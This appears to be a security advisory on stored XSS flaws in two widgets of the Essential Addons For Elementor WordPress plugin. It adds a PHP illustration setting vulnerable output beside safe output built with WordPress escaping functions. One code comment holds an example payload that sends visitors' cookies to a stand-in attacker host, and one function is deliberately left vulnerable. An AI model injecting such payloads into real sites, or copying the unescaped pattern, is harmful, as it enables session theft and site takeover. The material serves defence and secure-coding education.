WordPress site owners running the Essential Addons For Elementor plugin should take note: security researchers have disclosed Stored Cross-Site Scripting (XSS) vulnerabilities in two of the plugin's widgets. The plugin is installed on more than 2 million websites worldwide, so the exposure is broad, and the flaws put every visitor of an affected page at risk.
The vulnerabilities lie in the Countdown Widget and the Woo Product Carousel Widget, both part of the Essential Addons For Elementor plugin. They allow an attacker to inject a malicious script into a page served by the site; because the script is stored, it executes in the browser of every visitor who loads that page. From there the attacker can steal session cookies or other sensitive data and perform actions as the victim. If the victim is an administrator, that can escalate to full control of the website.
XSS vulnerabilities of this kind stem from inadequate input sanitization and output escaping. Sanitization filters untrusted values when they are stored, and escaping encodes them when they are written into HTML, so that attacker-supplied markup reaches the browser as inert text rather than as executable script. In these two widgets that filtering was missing or insufficient, so user-supplied widget settings were rendered into the page unescaped.
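To make the sanitization/escaping gap concrete, here is an added illustration in the style of an Elementor widget's render method. It is not the plugin's own code: the setting names (`countdown_label`, `countdown_link`, `countdown_id`, `countdown_description`) and the function names are hypothetical. The first function shows the vulnerable pattern; the others show the WordPress escaping functions (`esc_html()`, `esc_attr()`, `esc_url()`, `wp_kses_post()`) that prevent a stored setting from executing as script.

```php
<?php
// Added example, not code from Essential Addons For Elementor.
// Setting keys and function names below are hypothetical.

// VULNERABLE pattern: a widget setting that any user with editing rights
// can type into is printed straight into the page. Once saved, the payload
// runs in the browser of every visitor who loads the page (stored XSS).
function render_countdown_label_unsafe( array $settings ) {
    $label = isset( $settings['countdown_label'] ) ? $settings['countdown_label'] : '';
    // If $label is '<img src=x onerror="fetch(\'https://evil.example/?c=\'+document.cookie)">'
    // the browser parses it as markup and executes the handler.
    echo '<span class="countdown-label">' . $label . '</span>';
}

// HARDENED pattern: escape at output time, choosing the escaper that matches
// the HTML context the value lands in. The same string needs different
// encoding as a text node, an attribute value, or a URL.
function render_countdown_label_safe( array $settings ) {
    $label  = isset( $settings['countdown_label'] ) ? $settings['countdown_label'] : '';
    $link   = isset( $settings['countdown_link'] )  ? $settings['countdown_link']  : '';
    $css_id = isset( $settings['countdown_id'] )    ? $settings['countdown_id']    : '';

    printf(
        '<a id="%s" href="%s" class="countdown-label">%s</a>',
        esc_attr( $css_id ),   // attribute context: encodes quotes, <, >, &
        esc_url( $link ),      // URL context: rejects javascript:, data: and other unsafe schemes
        esc_html( $label )     // text context: '<img ...>' becomes literal '&lt;img ...&gt;'
    );
}

// If a setting legitimately carries limited HTML (a rich-text description),
// do not escape it wholesale; strip it down to the post-safe allow-list so
// <strong> and <a href> survive but <script>, on* handlers and javascript: do not.
function render_countdown_description_safe( array $settings ) {
    $desc = isset( $settings['countdown_description'] ) ? $settings['countdown_description'] : '';
    echo '<div class="countdown-desc">' . wp_kses_post( $desc ) . '</div>';
}

// Input-side sanitization on save (for example sanitize_text_field() on a
// plain-text control) is a useful second layer, but output escaping is the
// control that actually stops the script from reaching the browser, because
// stored data can arrive through imports, the REST API or older plugin versions.
```

The design point is that escaping is context-specific: `esc_html()` on a value dropped into an `href` would still let `javascript:` through, and `esc_attr()` on a text node would be harmless but misleading. Pick the escaper by where the value is written, and apply it at the last moment before output.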
Exploitation requires authentication: the attacker must first hold an account on the target site, whether obtained through open registration, a weak or reused password, or a compromised existing user. That raises the bar but does not remove the risk, because once the payload is stored it runs for every visitor of the affected page, including site administrators.
The issue warrants prompt action. It has been rated Medium severity with a CVSS score of 6.4 out of 10. Sites running Essential Addons For Elementor version 5.9.11 or earlier are affected and should be upgraded to the latest release to close the vulnerability.
Do not leave the site exposed. Update the plugin now, and since the flaw requires a logged-in account, review who holds accounts on the site and whether any are unused or weakly protected.